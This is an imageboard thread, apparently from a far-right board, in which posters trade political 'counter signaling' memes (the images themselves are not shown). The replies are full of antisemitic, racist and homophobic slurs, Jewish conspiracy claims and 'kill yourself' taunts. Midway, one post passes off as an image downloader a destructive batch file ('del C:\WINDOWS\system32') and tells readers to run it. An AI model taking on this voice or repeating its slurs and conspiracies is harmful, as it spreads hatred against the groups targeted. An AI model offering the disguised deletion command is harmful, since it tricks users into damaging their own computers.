Small cans of BTFO, I find these to be extremely effective. Feel free to contribute any rares you don't see here.
Counter Signaling Memes
puerile and obnoxious, perfect for this hellworld
stay mad shitskins
Daily reminder that most of these were made by the gay pedophile Cooper "Ghoul" Ward.
Posting in a comfy bread
Did you have a point?
I don't like how a lot of these criticize Religion of Cuck™ for being against things that Holla Forums is also against. I mean, it's okay to point out inconsistencies in liberals; but validating their insane beliefs on any level seems like a mistake. It just means that you'll be able to fight them over Muslim immigration, instead of attacking leftism at its core.
That last one is fucking great, the "I'm your white teacher" one, perfect.
My quick lazy submission, I've definitely heard this argument.
fuck, i made that third one! always good to see your memes alive.
Here, I have a great one.
2nd pic is about the person I use in my videos.
Hold up I got a even better one
Most of these are lame compared to the originals.
Holy shit that's awesome.
< counter signaling memes
< cult of Christianity
Genuinely, these kikes, everlastingly curse their Yahweh.
Christianity is a cult by definition.
Definitions designed by kikes…
Christianity was designed by kikes too, all that's different is a corpse on a stick.
whoever that is. memes are good.
According to the New Testament, yes. However, there is no historical evidence of that.
"source: a random screenshot that corroborates nothing I just said"
Nice trips but then again Religion of Cuck™ and leftism are also compatible in surprisingly a lot of aspects. You can say that Muslims are redpilled due to their obsession with kikes but you also need to remember that they have always been pretty much Judaism 2.0. In fact the only common interest between a conservative/nationalist movement and an Religion of Cuck™ic one is the JQ. But history has shown that Muslims are just as jewy as actual jews, the slave trade being one example. The way most leftists view Religion of Cuck™ic "conservatism" as being similar to conservatism and right wing beliefs in general is also a false equivalence to make it seem as if they're standing against all religions equally, while they most certainly aren't.
Not even; Jesus himself called out the kikes for being the children of satan.
I agree, but we cannot discount that Saint Paul was first a jew. He, however, abandoned entirely judaism, and was anti-circumcision.
But there is no real basis for saying any of these people existed, scientifically (historically, but historians often suck and have low standards).
2nd picture…is "the violence in lower manhattan" this faggot was referring to supposed to be 9/11?
Keep these coming. Every so often someone spams Tumblr with them and it sets people off.
Nice Bread op
tfw nobody posted my OC
sweden one is 10/10
The definition you're offended by is the erroneous one. There's nothing necessarily wrong with cults.
citation needed, faggot
I was here when most of these were made on this board around election time.
So this is the new tactic, flood the chan with cringe and hope you drive away the oldfags? Get fucked, moshe, go back to half.
That you are a cum-guzzling kike.
I feel like these are supposed to be templates more than anything.
Successors, not ancestors it is successors pissing on their ancestors’ graves. But very good one nonetheless
threads like these happen all the god damn time, calm down you try harding faggot.
i loved counter-signal memes for fashy goys
Which verse says that?
Behold, I will cause those of the synagogue of Satan, who say that they are Jews and are not, but lie—I will make them come and bow down at your feet, and make them know that I have loved you. – Revelation 3:9
shame that ghoul turned out to be a tranny fucking degenerate. if he wasn't a fag he wouldn't have ghosted and would still be providing us with little cans of BTFO
Didn't he get booted from the death panel?
Wouldn't that just show he isn't jewish?
Or he just couldn't handle the heat.
i hate this thread.
The art is shit, it is awful.
I was going to post and complain, but the more I read, the more I noticed that each meme really identified some bullshit that liberals say.
And there are so many. This thread should be archived and taught at school.
There should be more threads like this one.
BTFO Anti NeoCon trump kike shills
You leftists, muslims and antisemites are all so salty still that our NeoCon Republican agenda has won.
Ha Ha Ha I personally don't see what you're all complaining about you fashy based jewoCon voting patriots, if you didn't want our total jew control then why did you fashy based NeoCon supporting goys vote total NeoCon jewish control for?
Talk about dumb cattle marching themselves into the abattoir!
Get with the program goy, for future reference:
If you don't want a jew world order to enslave your children's children, then may I suggest you don't vote for the jew world order's puppets next time.
We win, and the dumb goy lose, and the best ever mods since Judas Iscariot can't help Rubbing your noses in it daily and making you beg for even more
Every day on Holla Forums we have been reminding you dumbfuck republicuck goy that you don't own nothing.
Least of all Holla Forums which has been under our control since way before Trump decided to stand as President to accelerate the jew world order.
Now remember while you goys are guests on Holla Forums please observe our rules:
1, Do not dare criticise our choice of Trump, you're just dumb cattle who we tell you who to vote for and then you can die in the wars we create for you with honour, serving your jewish masters and making you cheer your own demise on, got that?
2, This is our board naow, how you like that bitches?
Don't believe us jews own everything here?
Just try and post criticism of Trump, Bannon or Kushner
Try and dare make genuinely antisemitic content here
Try and promote a genuine white organisation here
Try to dare expose the oldest known frauds like Le Pen, Gert Wilders or any of the NeoCon zionist jews Trump appointed to the cabinet.
Go on goy, test us, you know we own Holla Forums and all you can do is praise ZOG or get banned.
Now if you have any further queries about what else you can do to serve the jew world order, just browse through the based sticky threads here and follow Imkampfy's hotpocktX directions,cheer every bill that hands over America to ZOG, and thank the mods every time we ban any legit user.
All your boards are belong to us!
Le LoL xD xD xD
It doesn't matter who they are; what matters is their meme's plan.
Alex Israel and Katie Foley are different people though. They just looked similar for a second in those vids.
If you're interested in the truth please stop posting lies.
don't be a retarded fag, he was a fag. if he wasn't a fag he would have rode it out and laughed
Wouldn't him leaving TRS be a good thing because TRS is fucking cancer though?
says the double nigger as he doubles.
Daily reminder that Nazi Germany was founded by a college dropout.
Daily reminder that the American rebellion was led by a traitor.
Daily reminder that Pepe was first drawn by a leftist pothead who never stopped whining about how 'his' meme was stolen.
Daily reminder that you're a shitty shill, and we're going to keep using these memes. Results are what matters.
How to download all the images on this page
Thanks for the thread
I enjoyed this over the course of one day. In small bits and pieces, but throughout a very high level of information.
I seriously should start putting up some stickers around the city. These are good for exactly that of people who only got attention spans of 3 seconds.
Step 1: Open Notepad on your PC
Step 2: Type this:
@echo off
del C:\\WINDOWS\system32
Step 3: Save this as: "Download_All_Pics.bat" Make sure you select "all files," rather than just "text document" when you do this.
Step 4: Double-click the .bat file
Step 5: Reboot your PC and enjoy automatic downloading of Holla Forums images whenever you want!
System32 jokes are deader than Jeb's political career. Work on something original user.
every once and awhile, it gets someone
thats a good one
Did I do it right?
There's some real spice in this thread. Meme on froggos.
I posted this (first one) somewhere recently in response to a "black inventors" bulletin board.
Why are you guys even trying at this point?
That's a shitty lefty meme user.
It's so poorly made I could barely tell
That's generally how you tell. Also how it attempts to use nihilism as an argument in itself.
Most OSs don’t allow you to modify/delete critical system files anymore. Idiots falling for this puerile chicanery is what rammed the botnet even further up our asses.
A lot of these are really good. OP has done good work I am jealous of his talent. OPs maymays may be spread, upboats etc.
t normie lurker
5th is completely fine with me
Colored guy is now colored
Daily reminder that user culture doesn't care. Also, two years, newfag.
Daily reminder, this shit is literally a forced kikebook meme pushed by kikes.
It really blows my mind that someone would bother posting on an user board and try to tie maymays to a personal identity. Maybe those types should fuck off and go somewhere where they can log in with their real name, face, SSN, and credit card.
but user that's how (((they))) make money
take memes, put on shitty website with tons of ads, muh_shekels.goyim
I use UnMHT in FF.
Anybody got the one where the white guy prattles on about how much he hates Muslims and loves Israel and the yid just goes "don't touch me filthy goy"? That one seems to have dropped off the face of the Earth
Just like the one where the black dude at the DNC takes a flag from some flagburners, shouts 'Take it from me, Commie' and laughs in their faces when they try to tell him he's stealing.
I wonder (((why))) these things are being memory holed.
I pay attention to your post.
I payed attention to your post.
Toppest of lels. I now realize my mistake.
Can you change that to 'A Pole'?
That last picture genuinely saddens me. Also, there is a typo (missing "is").
Thats not a typo, its proper
i was so surprised i didnt have the flabby racist niggress smuggie that i googled her and found her website and sent her a message saying 'youre a fat piece of shit'
i absolutely agree that 99% of the new talking heads trying to make a buck off of the meme that is 'alt right' are phonies and charlatans. The proudboy thing. theres a bunch of faggots and hiipsters and even trannies involved with needledick mcginnis. but ive grown enamored with the term proudboy. being proud of your boy. fatherhood. the nuclear family is a strong antithesis to this degeneracy and in my haste i bought a proudboy mug. should. I. kill. myself?
YFW when jew blames you for all of his poor choices and you’re attacked because they can’t get to him.
I like pics related better
This almost seems like pornography to me, even though I'm sure that's not the intention of the author at all.
Is Chris Cantwell a charlatan? I refuse to believe anyone is as stupid as he is to talk to any law enforcement.
This isn’t facebook and we’re not the alt-right or cuckservative.
Thanks for proving me right. Kill yourself.
Why the fuck is there a thread of just lefty-style cartoons? Is this thread meant to showcase what Aryan memes would look like if done in a lefty style? Is the goal to show how the left can't meme? Why put so many of these shitty cartoons out? They're disturbing to look at, tbh.
Bump, suckstart a shotgun, Schlomo.
ment for
Historiography can't be as accurate as something like physics.